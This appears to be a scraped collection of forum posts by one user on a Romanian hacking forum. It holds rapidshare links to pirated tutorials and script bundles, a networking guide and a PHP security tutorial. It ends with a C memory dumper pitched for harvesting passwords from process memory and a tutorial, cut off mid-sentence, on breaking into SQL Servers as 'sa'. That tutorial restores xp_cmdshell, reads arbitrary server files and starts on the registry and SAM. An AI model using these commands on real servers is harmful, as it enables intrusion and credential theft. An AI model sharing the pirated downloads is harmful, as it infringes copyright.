Gonzalez

Maya 8 Essential Training: Complete Video/HandsOn Tutorial "Your success is within your download reach" In this title, George Maestri explores the latest features of Maya 8, from the improved interface to the new productivity features for 3D modeling, animation, and rendering. The training also includes detailed tutorials on topics as varied as creating and connecting surfaces, texturing and shading, adding light and depth of field, and ghosting and motion trails. Exercise files accompany the tutorials. Table of contents Introduction Introduction 0:26 1. Getting Started Starting Maya and the Maya interface 10:30 Projects and opening scenes 5:48 Viewports and navigation 5:40 Menus, hotbox, and marking menus 6:43 Selecting and moving objects 7:36 Pivots 2:52 Customizing the interface 7:38 Grids and snapping 4:34 Outliner and hierarchies 4:07 Hypergraph 5:15 The Attribute Editor 4:20 Showing and hiding layers 4:11 Templates and selection masks 4:38 2. NURBS Modeling NURBS Primitives 5:59 NURBS Curves 5:04 Creating surfaces: Revolve 3:28 Creating surfaces: Loft 4:24 Creating surfaces: Extrude 2:53 Trims and projected curves 2:50 Curves on surfaces 3:06 Planar surfaces 3:06 Connecting surfaces with Fillets 7:49 Connecting surfaces with Stitch 5:31 Editing surfaces and Artisan 5:59 Deformations: Lattices 4:25 Non-linear deformations: Bend, Flare, Sine, etc. 5:09 In practice: Building a sub pt. 1 12:03 In practice: Building a sub pt. 2 9:50 3. Polygonal Modeling Polygonal primitives 6:02 Editing polygons 5:11 Beveling 3:54 Extruding 4:36 Using Cut on faces 1:35 Edge loops 2:30 Using Poke and Wedge on faces 2:52 Combining objects and attaching surfaces 3:11 Booleans 4:15 Merging vertices 7:14 Smoothing 7:25 Converting surfaces 4:34 In practice: Building a sub pt. 3 12:59 4. Texturing Applying shaders and shader types 7:23 Editing shaders and applying maps 8:25 The Hypershade window and shader networks 5:56 Multilister 3:06 UV mapping and textures 7:56 Projection mapping 5:38 Mapping polygons 9:09 Bump mapping 2:45 Displacement mapping 3:38 3D paint 5:59 Texturing a sub 14:20 5. Rendering Types of renderers and render globals 7:29 Adding lights to a scene 10:30 Lighting attributes and shadows 8:42 Cameras 9:15 Depth of field 4:20 Raytracing 8:43 Mental Ray 5:06 Mental Ray lighting 8:20 Mental Ray depth of field 4:15 Motion blur 5:34 9.2 MB Mental Ray global illumination 7:39 Mental Ray caustics 5:03 9.1 MB Batch rendering and command line rendering 7:22 In practice: Lighting a scene 9:12 6. Animation Introduction to animation 7:14 Playblast and playback 7:15 Ghosting and motion trails 4:36 Dope Sheet 4:46 Curve Editor 7:01 Cycles 5:30 Animation paths 3:17 In practice: Animating a sub pt. 1 12:16 7. Paint Effects Painting objects 10:13 Creating brushes 8:27 Managing brushes 6:32 The Paint FX window 3:22 Conclusion Goodbye 0:22 Download : http://rapidshare.com/files/38796871/v-lm8etr.part01.rar [url]http://rapidshare.com/files/38796871/v-lm8etr.part02.rar[/url] [url]http://rapidshare.com/files/38796871/v-lm8etr.part03.rar[/url] [url]http://rapidshare.com/files/38796871/v-lm8etr.part04.rar[/url] [url]http://rapidshare.com/files/38796871/v-lm8etr.part05.rar[/url] [url]http://rapidshare.com/files/38796871/v-lm8etr.part06.rar[/url] [url]http://rapidshare.com/files/38796871/v-lm8etr.part07.rar[/url] [url]http://rapidshare.com/files/38796871/v-lm8etr.part08.rar[/url] [url]http://rapidshare.com/files/38796871/v-lm8etr.part09.rar[/url] [url]http://rapidshare.com/files/38796871/v-lm8etr.part10.rar[/url] [url]http://rapidshare.com/files/38796871/v-lm8etr.part11.rar[/url] [url]http://rapidshare.com/files/38796871/v-lm8etr.part12.rar[/url] [url]http://rapidshare.com/files/38796871/v-lm8etr.part13.rar[/url] [url]http://rapidshare.com/files/38796871/v-lm8etr.part14.rar[/url] [url]http://rapidshare.com/files/38796871/v-lm8etr.part15.rar[/url] [url]http://rapidshare.com/files/38796871/v-lm8etr.part16.rar[/url] [url]http://rapidshare.com/files/38796871/v-lm8etr.part17.rar[/url] [url]http://rapidshare.com/files/38796871/v-lm8etr.part18.rar[/url] [url]http://rapidshare.com/files/38796871/v-lm8etr.part19.rar[/url] [url]http://rapidshare.com/files/38796871/v-lm8etr.part20.rar[/url] [url]http://rapidshare.com/files/38796871/v-lm8etr.part21.rar[/url] [url]http://rapidshare.com/files/38796871/v-lm8etr.part22.rar[/url]

Beginning Expression Web Book Description Microsoft Expression Web gives you the tools to develop sophisticated sites that integrate standardized CSS layout with ASP.NET 2.0, XML, and SQL Server™ 2005. Written by an experienced ASP.NET and Dreamweaver Web developer, this book shows you how to take advantage of all of Expression Web’s innovative features to create a memorable online experience. Zak Ruvalcaba provides you with expert tips and techniques on Web page structuring, page formatting using style sheets, utilizing HTML forms, and working with XML data. As you progress through each chapter, you’ll discover how to apply this information in order to design and develop new Web applications. Task-oriented examples are also integrated throughout the pages book that you can leverage as you build your own cutting-edge, standards-based Web site. Some of the topics covered include: Working with Images, Media, and Hyperlinks Page Formatting Using Cascading Style Sheets Web Page Structuring Techniques by Using Tables Advanced Page Structuring Techniques by Using Layers and CSS Designing Table-less Web Sites by Using Layers and CSS Adding Interactivity with Behaviors including Call Script, Check Browser, Check Plug-in, Go To Url, Open Browser Window, and Preload Images Working with HTML Forms and Form Controls including input text and password, checkboxes, radio buttons, drop down boxes, and testing your forms Introduction to Web Application Development including client side, server side, and .NET introductions Accessing and Displaying Database Data including connecting to both Access and SQL Server 2005 Express Edition databases and working with DataSource Controls, List Bound controls, and data controls Inserting, Editing, and Deleting Database Data including working with the FormView and GridView controls Validating User Input with RequiredFieldValidator, CompareValidator, RangeValidator, ValidationSummary, RegularExpressionValidator, and CustomValidator controls Securing Your Web Applications including configuring application services and forms authentication Working with XML Data including binding XML data and working with RSS Building Accessible and Standards-Compliant Web Sites including accessibility testing Download : 10 MB http://rapidshare.com/files/26057416/Beginning.Expression.Web.Mar.2007.rar

Asta va arata cine downloadeaza mai mult din grupul vostru : http://rpd.jamontoast.net/rs/ 1. Logheazate aici -> https://ssl.rapidshare.com/cgi-bin/premiumzone.cgi 2. Click Logs 3. Mouse 2 pe pagina si click pe "View Page Source" sau similar 4. Copiaza HTML-ul si punel in prima pagina,adica aici : http://rpd.jamontoast.net/rs/ Nota : Arata doar IP-urile care au folosit 1% sau mai mult din bandwidth Bafta ! -Gonzalez

Site special pentru gameri Afla de aici daca PC-ul tau e compatibil cu jocul dorit. http://www.systemrequirementslab.com/ Bafta -Gonzalez

El va fi urmatorul Valentino Rossi garantat 100% Nos bate-ti coasa! -Gonzalez

"Submit-A-Link" Style Script linksubmit.zip "Suggest My Site" Script suggest.zip "Users Online" Script #1 usersonline.zip "Users Online" Script #2 cjusersonline.zip Advanced Guestbook Script guestbook.zip Affiliate Banner Rotation Script adrotator.zip Affiliate Linkmaster affiliatemask.zip Affiliate Program (Advanced Version) postaffiliate.zip Affiliate Program (Basic Version) phpaffiliate.zip Another PHP Web FTP Program webftp.zip Auction Website phpauction.zip Auto Hits Script scau.zip Automated Form Submission Prevention human.zip Bookmarks/Favorites Script bookmarks.zip Build a Webring webring.zip ClickBank "Thank You" Page Protector Script cbscript.zip Client Invoicing Script myinvoice.zip Document Management System sdms.zip Easy Administration Program easyadmin.zip EasyStream easystream.zip Electronic Reminder Script ereminder.zip Expired Domain Finder wgs-expire.zip FAQ Generator whatdafaq.zip FAQ Manager faqmanager.zip FFA Links Page Script ffalinks.zip File Transfer Script net2ftp.zip Hot Mailing List Script newsletter.zip ICQ Pager Script pager.zip Image to ASCII Generator img2ascii.zip Image Watermarking Script watermark.zip Instant Photo Gallery Script instantgallery.zip Instant Site Maker instantsm.zip Link Listing Script links.zip Links Exchange Website conservatory.zip Live Help Script livehelp.zip MySQL Database Backup Perl Script backupscript.zip News Publishing Script topstory.zip Office Intranet Suite intranet.zip Online Classifieds Script classifieds.zip Online MultiPlayer Chess webchess.zip osCommerce PHP Shopping Cart oscommerce.zip PassGen passgen.zip PaymentPal paymentpal.zip Perpetual Traffic Generator trafficgenerator.zip PHP & MySQL Content Management System contentm.zip PHP Form To Email Script SECURE! emailer.zip PHP Message Boards Script messageboard.zip PHP-based eCard Script/Website gcards.zip POP-UP Creator popup.zip Powerful Portal with Content Management phpx.zip Secure Authentication Script authentication.zip Simple Yet Powerful Download Counter Script hitcounter.zip Sophisticated PHP Ecommerce Site xtcommerce.zip Sports League, Fixture and Prediction Management Script phpfootball.zip Toplist Website Manager #1 toplist.zip Toplist Website Manager #2 topsites.zip USENET News Client newsgroup.zip Visitor Logging Script tollbooth.zip Web Event Calendar calendar.zip Web Portal System geeklog.zip Web-Based Address Book Script wa-boo.zip Web-based Image Management System photoseek.zip Web-based POP Email Client webmail.zip Website Stats Business trafficgopher.zip Whois Lookup whois.zip Yahoo Style Link Directory/Search Engine sslinks.zip Download : http://rapidshare.com/files/3406823/All.In.One.100.PHP.Select.Scripts.zip

MySQL, C++, DirectX, HTML, Java, and VB Video Tutorials - No Downloads Fara a descarca http://sean.cruels.net/ Bafta ! -Gonzalez

Saracu copil, sigur nu traieste el mult. -Gonzalez

Cum alegem tipul de retea de care avem nevoie Cat timp RST-ul isi schimba hostul, din plictiseala am creat tutorialul, din cauza faptului ca m-au scos "hackarii" de pe retea (poveste lunga). Nu conteaza, sper sa va placa tutorialul. Totul se rezuma la scopul retelei. Cand te decizi la ce anum o vei folosi. La jocuri? La transfer fisiere? Uz general? Si una si alta? Apoi apare si problema locatiilor, unde locuieste A si unde locuieste B, apoi unde locuieste si C, si ulterior restul alfabetului, pentru ca in fond orice retea se extinde. Inceputul este intotdeauna mai greu, pentru ca fiecare persoana care se gandeste la o retea ia in calcul si posibilitatea etinderii si primul gand sare la echipamente, adica sa nu devina inutile ulterior si practic sa fie o investitie fara sens. Primul pas Daca sunt trei starteri ai reteli in acelasi bloc ( de exemplu ) totul este foarte simplu. Este nevoie doar de un switch cu 5 port-uri UTP si cablurile de retea aferente. Acum apare problema unde sa fie gazduit switch-ul, la X, la Y sau la Z? Cel ma bine ar fi pe un teren neutru, pentru a nu aparea vreo discutie genul " imi consuma prea mult curent" . Chiar exista o astfel de posibilitate, adica o locatie neutru, bineinteles, daca va va da voie administratorul blocului. Care sunt acele locatii neutre posibile poate va intrebati. Practic oriunde in bloc. Ideal ar fi sa existe o priza langa, asta pentru a nu folosi prelungitoare. Da stiu, prize nu se gasesc oriunde vezi cu ochii intr-un bloc. Exista insa vechea consola a antenelor va spun ca administratorul blocului nu are nimic impotriva . In orice caz e bine de stiut ca cea mai avantajoasa solutie pentru o retea de bloc ramane cea cu fire ( wired ) si asta pentru ca acces point-urile disponibile nu pot oferi o arie de acoperire atat de mare. Si ar mai fi de adaugat si pretul, un switch sau doua sau chiar trei, nu se compara cu banii dati pe tot atatea acces point-uri. Ar putea fi luata in considerare varianta wireless daca de exemplu trei membrii ai retelei au apartamentele pozitionate unul deasupra altuia, atunci acces point-ul ar putea oferi din apartamentul mijlociu semnal destul de puternic pentru ceilalti doi. Tot wireless este iarasi o idee buna pentru un singur apartament, asta ca sa nu stai cu prea multe fire prin casa, sa te impiedici de ele si asa mai departe. Insa si aici apare diferenta de pret, un switch de 5 port-uri neputand fi comparat cu cel al unui acces point, chiar daca intra in socoteala si firele de retea folosite in apartament, costurile tot raman mai mici pe wired, asta bineinteles daca folosesti o conexiune pe 100 Mbps. Automat, daca se foloseste o solutie wireless in apartament deja reteaua devine mixta, asta daca legatura la restul retelei se face wired, lucru care mai mult ca sigur se va mai face mult timp de acum inainte. Mai exact, pana cand costurile vor fi aceleasi sau vitezele celor doua tipuri de retele vor putea fi comparate. Retele cu fir Aici se ridica trei intrebari si anume : Cum? Unde? De ce? Respunsul : Cum? - Cu un switch si cateva cabluri de reatea Unde? - In bloc sau chiar in cartier De ce ? - Pentru ca este cea mai avantajoasa solutie Cel mai bine ar fi, pentru a va creea o idee cat mai ampla asupra retelelor, sa insiram o lista cu avantaje si dezavantaje. Primul avantaj adus de retelele cu fir este, dupa cum sugeram si mai sus, viteza.Deja am ajuns in perioada in care orice placa de baza vine echipata cu o placa de retea, care din fericire este si gigabit, oricum nu este prea interesant acest aspect, decat pentru a te lamuda ca ai placa de reate pe 1.000 Mbps. Cum spuneam, viteza este cel mai important aspect si aproape orice retea wired, ma refer la cele de cartier, functioneaza pe 100 Mbps. Aceasta viteza este superioara celei obtinute cu echipamente wireless si practic este cea mai ieftina solutie. Adica un switch cu 8 port-uri care nu este produs de o firma de renume costa undeva in jurul sumei de 60-70 RON. O placa de retea pe 100 Mbps, acest lucru ii intereseaza pe cei ce nu detin placa de retea integrata pe placa de baza, costa undeva in jurul sumei de 20-30 RON. Un metru de cablu UTP, cei drept nu de cea mai buna calitate costa aproximativ 0,5-0,7 RON. Dupa cum se poate trage foarte simplu concluzia o retea wired se poate construi cu cel mai mic efort financiar/persoana. Marele dezavantaj adus de echipamentele low cost, este dat de calitatea slaba a acestora. Credeti ca e afacerea foarte buna cu acele cabluri de 5.000 lei vechi/metru? Nu, nu este, mai ales daca nu il folositi in interior. Pe langa asta mai e si foarte greu de mufat un asemenea cablu pentru ca firele din interior sunt foarte subtiri si sunt destul de greu de nimerit sinele mufei UTP. Si switch-urile ieftine au la fel probleme, chiar daca au ele carcasa metalica si legati un fir de el si de calorifer, la o variatie ceva mai mare de curent electric oferit de transformatorul acestuia este foarte posibil sa crape. De asemenea, daca este folosit cablu UTP pentru conexiune la blocul vecin, mai mult ca sigur dupa o furtuna port-ul in care era acel cablu bagat e mort, daca nu tot switch-ul. Oricum exista protectii pentru a evita aceste neplaceri. Insa apar alte neplaceri deoarece rezistenta cablului este foarte scazuta si la un vant ceva mai puternic acesta incepe sa se frece de o margine a unei suprafete si pana la urma cedeaza, ceva mai repede daca este UTP ieftin. In schimb, placile de retea sunt ok, singurul lucru care ar putea reprezenta un dezavantaj ar fi faptul ca nu sunt capabile de offload, astfel ca ele utilizeaza foarte mult procesorul cand transmit sau receptioneaza pachete de date. Bine-nteles pentru ceva mai multi bani si calitatea produselor creste, logic. Acelasi lucru se intampla si cu fiabilitatea. Oricum momentan raman preferatele tuturor retelele cu fir din cauza costurilor reduse, teoretic, si datorita visului de a avea o retea pe 1.000 Mbps, viteza suprema . . . pentru moment. Retele wireless Din nou cele trei intrebari : Cum? Unde? De ce? Raspunsul : Cum? - Cu un acces point si dispozitie wireless Unde? - Chiar oriunde, ma rog, in limita bunului simt sau al semnalului De ce? - Pentru ca este mult mai comod, chiar daca este sacrificata viteza Cateva cuvinte despre acces point-uri. In principal functioneaza precum switch-ul, doar ca firele sunt invizibile . Un mare dezavantaj al acces point-urilor este daca sunt conectate intre ele wireless, deja la al 3-lea "HOP" distanta apare lag-ul, intarzierea pe care orice gamer o uraste. Marele avantaj, deductibil din denumirea tehnologiei, este ca nu mai sunt fire. Poti sa folosesti laptopul unde vrei practic, nu doar unde ajunge cablul de retea. Poti sa muti calculatorul in orice colt al camerei sau casei vrei, fara a sta sa te gandesti ca nu iti ajunge cablu. Si cel mai important, nu crapa daca este vreo furtuna afara. Nu necesita o experienta speciala pentru a putea pune in functiune un acces point, oricine poate face o retea wireless. Nu trebuie mfuate cabluri, decat in cazul in care este vorba de combinare de retele wireless cu wired. Exista cateva dezavantaje precum rata de transfer, sau costurile cand vine vorba de upgrade pentru a imbunatatii semnalul sau viteza pusa la dispozitie. Spuneam upgrade in sensul de schimbare a acces point-ului si a dispozitivelor, adica trecerea la alt standard. Un fel de avantaj ar fi dat de faptul ca pentru imbunatatirea calitatii semnalului e nevoie doar de schimbarea antenei. Ar mai putea fi considerat un avantaj si faptul ca la vitezele oferite calculatorului nu ramane "blocat" pentru a putea servi colegii/vecinii care copiaza prin retea. Un alt dezavantaj apare daca un prieten din blocul vecin vrea sa se conecteze la acces point si are geamuri termopan. In general aceste geamuri taie cam 40% din puterea semnalului. Prin cartier mai intervin si alti factori perturbatori, ce pot face conectarea la distante mai mari practic imposibila. E bine de stiut ca semnalul se mai si reflecta si ca un bloc in cale chiar face imposibil accesul. Cititnd cele de sus se pot sustrage dezavantaje puternice ce i-ar putea face pe multi sa se razgandeasca in privinta wireless-ului, aceasta tehnologie este si va ramane apreciata in continuare si pentru comoditate. In viitor, avand in vedere ca deja sunt existente pe piata produse MIMO ( multiple in, multiple out ), acesta tehnologie va fi apreciata si pentru viteza. Deja vitezele sunt aproape egale cu cele unei retele wired pe 100 Mbps. Sfaturi Bine-nteles ca sunt necesare, pentru ca nu toti oamenii sunt facuti sa sertizeze un cablu, sau sa il intinda intre blocuri, sau sa cumpere cablul potrivit. -> Este bine de stiut cam cum trebuie sa fie cablul de reatea atunci cand va decideti sa il achizitionati. Un cablu subtire va avea si firele din interior subtiri si va fi greu de sertizat pentru ca firele vor scapa din sinele mufei. De asemenea, piedica care se actioneaza atunci cand este sertizat nu se fixeaza bine pe un cablu subtire si este posibil ca dupa cateva miscari mufa sa iasa. -> Codul culorilor nu este obligatoriu sa fie respectat, insa atunci cand este sertizat un cablu este bine sa fie folosit aceasi schema, chiar daca cu alte culori. -> Daca lungimea cablului depaseste 20m este obligatoriu sa fie folosita schema culorilor, altfel reteaua va functiona la o viteza de 10 Mbps. -> Este bine de stiut ca lungimea cablului pana la care se poate stabili conexiunea nu este batuta in cuie. Depinde foarte mult de cablul folosit, de switch si de placa de retea, daca acestea sunt de calitate buna lungimea firului poate sa fie si de 150 m fara a creea probleme la conectare sau la transfer. -> Oricum ar fi reteaua pe care va decideti sa o infaptuiti, prin interiorul blocului sau pe afara tineti cont de parerea vecinilor, ar putea sa va taie firele si ar fi foarte "dureros" si neplacut. -> Pentru a trage un cablu de retea intre blocuri este nevoie de aprobarea Primariei ( Depinde de caz ). -> Daca reteaua e prin interior incercati sa faceti in asa fel incat aspectul blocului in interior sa nu fie unul industrial. Canalul de cablu nu este foarte scump si arata mult mai bine decat 10 fire de reatea fiecare de culoare diferita. -> Daca se doreste o retea wireless, este foarte important pozitia acces point-ului fata de membri retelei, trebuie gasita o locatie de mijloc -> Este foarte important ca dispozitivul wireless sa emita cu o putere maxima de 100 mW ( valoarea maxima admisa de lege ) si intensitatea relativa maxima sa fie de 20 dB, la fel si aceasta fiind valoarea maxima permisa. -> Aveti grija cu antenele wireless foarte puternice, undele radio prea intense ar putea sa va afecteze sanatatea! -> Ganditi-va foarte bine intainte de a face vreo achizitie, este foarte important ca produsul ales sa ofere scalabilitate, pentru ca orice retea se extinde si intr-un final un switch cu 5 port-uri va deveni inutil. Multumesc pentru atentie! -Gonzalez

Corect spus Kwe, asta ar merge sticky -Gonzalez

Not for sale , Remus sayed, it can be shared, but put credit ! Welcome to RST! -Gonzalez

Its a natural thing to secure your website, or so you would think. PHP comes with tons of security features that many web developers dont consider when coding a website. Security is in place to protect your members sensitive data and to prevent defacements or at worst to prevent server comprimise. I will cover a couple security measures that you can use when writing "proper" PHP code. Nobody wants to wake up to a website thats been hacked overnight or while your on the shitter. Some of the most basic and overlooked things are, cleaning your variables and all user input. Many variables themselves can be overwritten with user specified data from a malicious user. Let's say you have an admin panel on your website thats not the most secure thing y'know, but it works well. Someone finds a hole or bruteforces their way in without any visiable knowledge. That admin panel maybe be able to delete files. Whats to say the attacker doesnt just delete files but goes ahead and deletes passwd entires or other sensitive server files that would stop them from advancing. all inputs from the "outside" coming in should be checked for malicious content!!! I will not cover security with your database. I have written many articles on SQL injection, if you dont know what it is please research it. Database security is very inmportant, I will not cover it here. Magic Quotes Magic quotes are a "godsend" when it comes to dealing with user input. When this option is tunred on (located in your php.ini) it will escapes all single and double quotes, backslashes, and NULL bytes from a users input with a backslash. The problem with turning magic quotes on is that maybe you want your users to use single or double quotes, or when uploading files. If you turn this off you can at "runtime" parse the strings from the user entered data. If your new to PHP i would suggest turning this on until you learn how to properly parse and display data that users enter. I personally use a "clean" function that i've written. I will give you a basic "on-the-fly" one just for this tutorial so you can start building your own cleaning function. <?php function clean($string) { $string = stripslashes($string); $string = htmlentities($string); $string = strip_tags($string); return $string; } ?> you would use this function like below, if your user was submitting a form that required a username. <?php $username = $_POST[username]; echo clean($mystring); ?> There are 3 directives for the magic quotes, refer to the php.net website or the php manual. Basically the 3 directives are magic_quotes_gpc, these deal with the request data (get, post, cookies). magic_quotes_runtime deal with flatfiles and databases, external files. the third is magic_quotes_sybase, this will override the magic_quotes_gpc if its enabled. This one will escape single quotes with another single quote. --------------- Security Through Obscurity Recently you may not have noticed, I sure have on some websites where an ASP or PERL extension can be found in place of the normal PHP when you know for true, 100% fact that the website is running a php/sql based front and backend. This is "obscurity through security" when instead of telling the attackers your using php scripts you mislead them into thinking your running perl or pythoin or whatever type of script you want. For example, your run a php script with the .php extension, like normal. Rather than showing the world your "hello.php" script you can actually use Apache to "hide" or "obscure" the real file's extension. So instead of normally using "hello.php" you could disguise the file to viewers as perl, "hello.pl" even though its a PHP script. like so... Im sure if an attacker is just looking for something to fuck with when he comes across a .sun file that runs like a php file, theyll will be heartbroken and confused. Give it a try. The above codes are for the Apache configuration file. If your on a shared hosting you may not have access to the Apache configuration files, Maybe you could make some suggestions to your host. --------------- Register Globals This is a big change in PHP when 4.2 came out. This is an on/off option in the INI file for php (php.ini). PHP doesnt force you to initial variables like other languages, for this, people think its a very insecure language. When register globals is on it will allow a request to set a variable. The best kind of example is a member login form. Let's say register globals is on.. <?php if($authed = true) { echo "my sensitive information"; } ?> Any user can get to the "sensitive information" by sending a GET request. You could do this via telnet or by browser, like so sin.php?authed=true, which reveals the sensitive information. Turning them off will defeat this problem. Now when we try to visit the site sin.php?authed=true, It will be blank. Users cannot initialize variables from an external source. Another way to protect your variables from external sources would be to check if they are submitted via a GET or POST request. <?php $authed = true; if(isset($_POST[authed]) || $_GET[authed]) { echo "variable violation"; } else { if($authed == true) { echo "my sensitive information"; } } ?> By monitoring the GET and POST requests we can check to see if someone is trying to inject something into our variables without the script doing it. Usually followed by not only a message telling them they have wrong the variable, but usually a mail() will follow to notify the admins on the website. I love this one. Credit: Sunjester

++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ +This is a little Disclaimer for if you havn't read the one on our site. + +The tools and tutorials KD-Team develops and publishes are only ment for + +educational purpose only.WE DO NOT encourage the use of this tools and + +tutorials for mailicious purpose.We learned a lot during the development of them + +so we hope you also learn and don't just use it without any brains. + +We take completly NO responsability for any damage caused by them nor + +are we or our isp responsible for what you do with them. + +Greetz: KD-Team + +[url]http://www.kd-team.com[/url] + ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ Tutorial On How To Read Memory In C Written By: kd-team Turn wordwrapping one, in some editors it reads better. 1) Intro 2) Why Read Memory? 3) Reading Memory 4) Last Words 1) Intro Well here is another tutorial of me This time it will be lotsa concentrated on coding instead of just entering commands in some app to let it do what you want. Hope that with this little tut more people get interested to code things and step of the batch idea ( I am NOT saying batch is bad but only that coding with a programming language give you more power/control of the machine). This is my first tutorial on a somewhat more advanced topic so if I make big mistakes regarding the topic bitchslap me else uhm just warn me then bitchslap me. Well think that I have bullshitted enough now so let's get on with the next section. 2) Why Read Memory? Hmm that is a good question but luckily this question has got a answer. Like you know all application use memory so it has to have some proper used wouldn't you think? Well they do but we are not gonna discuss all of them uses in here. What I want to make clear here is that some programs store the password unencrypted in the memory* cause they think it won't be read since it's there such a short period of time(other cases it may be a long period). So this could be one of the purposes to write a memory dumper. 3) Reading Memory Well to read memory you need a few different things but I am trying to walk you through and explain everything as good as possible. #include <stdio.h> //for input output of things. #include <windows.h> //So we can use windows functions Well first we need a proccess id we can do this by code but this time we will just get it with the help of some program or in xp with tasklist just pick a proccess id of which you would like to read the memory. Why you need a proccess id you ask? well cause some of the function we are gonna use require it. Also take note that some processes protect themselves by making parts of memory not readable so then you just get error. void main(int argc,char *argv[]) { //first let's declare some vars char buf[24000]; //this is the buffer where the read memory is stored DWORD bufsize = sizeof(buf); //here defina how much bytes we are gonna read DWORD hPID=0; //just defining a standard pid HANDLE hReadp; //handle that will hold the return of the openprocess funtion //since we don't use code to get the process pid we will just ask the user for it here. printf("Enter Process Id: "); scanf("%d",&hPID); //here we use the OpenProcess funtion to open the desired process with the necessary rights. hReadp = OpenProcess(PROCESS_QUERY_INFORMATION | PROCESS_VM_READ,FALSE, hPID); if(NULL != hReadp) { /* The actual reading of the memory adres first var is the handle that OpenProcess returned the 0x400000 is the base adres (almost)all .exe in win32 use that. the next 2 vars we already discussed them when declaring them. last var returns into a buffer how many bytes where read so if not interested you can leave it NULL if I am correct all processes have memory from 0x000000 till 0xffffff so that would be the whole space you have to read and find possible interesting things in it. */ int ret = ReadProcessMemory(hReadp,(LPCVOID)0x400000, &buf, bufsize,NULL); if(ret<=0) { printf("failed %d\n",GetLastError()); } if(ret>0) { //Here we will be printing the buffer that holds the memory info for(int e=0;e<=sizeof(buf);e++) printf("%c",buf[e]); } } //close the handle that we got from OpenProcess CloseHandle(hReadp); } 4) Last Words Well this was my first tut concerning code. Hope you all liked it and it was usefull and answered some of your questions. I kinda just started with C only been with it like 3 month with some pauses in between so my code ain't the prettiest one out there or the best optimised. Suggestions are always welcome I just won't be updating this document since this is just a little tut for simple memreading nothing fancy. Cause there are more things to automated some things in here like the baseadres and the pid etc. Well enjoy and have fun with it. Oh and plz excuse my english. Greetz: KD-Team * a good paper on passwords and memory is the pdf written by: Abhishek Kumar Titled: Discovering passwords in the memory

++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ +This is a little Disclaimer for if you havn't read the one on our site. + +The tools and tutorials KD-Team develops and publishes are only ment for + +educational purpose only.WE DO NOT encourage the use of this tools and + +tutorials for mailicious purpose.We learned a lot during the development of them + +so we hope you also learn and don't just use it without any brains. + +We take completly NO responsability for any damage caused by them nor + +are we or our isp responsible for what you do with them. + +Greetz: KD-Team + +[url]http://www.kd-team.com[/url] + ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ *********************************************************************************************** *Hacking Secured SQL Servers * *Tutorial Written By: kd-team * *Creditz: Swiv,[url]www.google.com,www.sqlsecurity.com[/url] * *Use on you're own Risk. * *All the things in here will only work if the corresponding .dll files exist and are original.* *********************************************************************************************** 0) Index 1) Tools Needed 2) The Easiest Way 3) Restoring xp_cmdshell 4) Reading almost any file on server 5) Reading The Registry 7) Final Words 0) Index This tutorial is intended as a guide to hack the secured sql servers. Conentrating on the well known SQL_ERROR respons. This means: - Hack sql servers that has only got a normmal user pass - Hack sql servers where the stored proceduure xp_cmdshell has been disabled This DOESN'T mean: - Hack sql servers where the .dll has been changed or switched with another one. - Explaining how to bruteforce sql server aaccounts Hope this tutorials is ofany use to those who want hack more things or just want to know things. Plz bitch about this tut if things don't work but don't start bitching that it is to slow to hack more then 10 machines a day. I also want to thank Swiv for his time to answer my question and to his portion of contribution to this tutorial. 1) Tools Needed - A server with port 1433 open and the corrrect username/password - osql.exe - sqlexec.exe written by sunx (the 1 with tthat has the green apple as icon) ALSO keep in mind that all of the given commands only work if they are enabled else it will fail ********************************************************************************************************* 2) The Easiest Way First of all make shure you use the correct sqlexec version and not "sqlexec for nethacker 1.0" So use sqlexec.exe that has a green apple als icon. When opening it has a very simple interface and only 1 thing that "sqlexec for nethacker 1.0" hasn't got that is the format field. In that combobox (that is empty when opening the app) you can select 4 ways of sending the data to the sql server. The options: 1 xp_cmdshell"%s" 2 select * from openrowset etc 3 create procedure #proc_temp etc 4 %s Option 1 is the same as in "sqlexec for nethacker 1.0" So when "sqlexec for nethacker 1.0" gives a SQL_ERROR this app wil do also BUT when selecting option 2 most of the time you will be able to hack the server in normal way. ********************************************************************************************************* 3) Restoring xp_cmdshell Restoring xp_cmdshell seems like difficult task but in fact it is easy. first of all this only works when the stored procedure xp_cmdshell is dropt if the .dll has been changed then it won't work. Tis is only intended when the easy way doesn't work but most of the time it does. Put the following in a .txt(example: restore.txt) and save it in te same directory as osql.exe is ////////////////////////////////////////////////////////////////////////////////////////////////////// use master / exec sp_addextendedproc 'xp_cmdshell', 'C:\Program Files\Microsoft SQL Server\MSSQL\Binn\xplog70.dll'/ go / ////////////////////////////////////////////////////////////////////////////////////////////////////// The above path depends on the installation of MSSQL so it can be different under some circumstances. when done execute osql.exe like this: osql.exe -S 123.123.123.123 -U sa -P "" -i restore.txt Now if everything went how it is supposed to go, the xp_cmdshell is enabled again and you can use option 1 from sqlexec or the other app to hack the machine. If you want to view all stored procedure on the server currently in youre power execute osql like: osql.exe -S 123.123.123.123 -U sa -P "" -Q "sp_stored_procedures" Keep in mind that this also has got procedures made by a admin and maybe hasn't got the standard ones. ********************************************************************************************************* 4) Reading almost any file on server I say any because sometimes when the file is to big it refuses to read it. It also refuses to read when the file is in use. First of all check if the file is on the server before attempting to read it for that execute osql like: osql.exe -S 123.123.123.123 -U sa -P "" -Q "xp_getfiledetails 'c:\winnt\system32\net.exe'" If the file exists it will give back some numbers meaning filesize,date etc. When teh respond was a positive repost put the following in a .txt(example: read.txt) and make shure it is in the same folder as osql.exe //////////////////////////////////////////////////////// Create proc sp_readTextFile @filename sysname / as / begin / set nocount on / Create table #tempfile (line varchar(8000)) / exec ('bulk insert #tempfile from "' + @filename + '"')/ select * from #tempfile / drop table #tempfile / End / go / //////////////////////////////////////////////////////// when done execute osql.exe like this: osql.exe -S 123.123.123.123 -U sa -P "" -i read.txt You have now succesfully created a stored procedure to read files.Now how doyou read files with it? Very simple use osql.exe like this: osql.exe -S 123.123.123.123 -U sa -P "" -Q "sp_readTextFile 'C:\winnt\system32\drivers\etc\services'" -o c:\breadfile.txt Then just browse to youre local C: and there you will find the file.Only problem is there will be a lot of wite stripes and "-" character that is the normal sql output way I can't do anything about that. ********************************************************************************************************* 5) Reading The Registry Reading the registry cna be handy when there is valuable information stored into it like passwords or usernames. I'll give a little example on how to read the sam file just take 1 note even if you read the sam file on a win2k machine it is useless because of the standard security it has. Explanation on what you can do with registry reading will be explained later. Fire up osql.exe and 